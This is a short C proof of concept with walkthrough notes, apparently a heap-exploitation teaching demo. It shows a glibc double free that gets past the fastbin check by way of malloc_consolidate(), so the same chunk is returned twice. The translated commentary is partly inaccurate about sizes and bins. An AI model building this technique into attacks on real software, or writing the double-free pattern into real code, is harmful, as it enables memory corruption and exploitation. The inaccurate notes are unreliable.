Source
1 #include <stdio.h> 2 #include <stdint.h> 3 #include <stdlib.h> 4 5 int main() { 6 void* p1 = malloc(0x40); 7 void* p2 = malloc(0x40); 8 fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2); 9 fprintf(stderr, "Now free p1!\n"); 10 free(p1); 11 12 void* p3 = malloc(0x400); 13 fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3); 14 fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n"); 15 free(p1); 16 fprintf(stderr, "Trigger the double free vulnerability!\n"); 17 fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n"); 18 fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", malloc(0x40), malloc(0x40)); 19 }
operation result
checksec
First apply p1, p2 two 0x40 amount of memory, within the size range fastbin
After the release p1
Apply for a 400-byte p3 belongs to the small bin trigger malloc_consolidate ()
The fastbin of p1 into small bin
At this point p1 is not fastbin head
It can be released again
After release
fastbin and small bin in both p1
Again application can get two points p1 memory
FIG obtain the debugging, it is understood, in the first remove fastbin p1, then remove the small bin p1
This has resulted in double free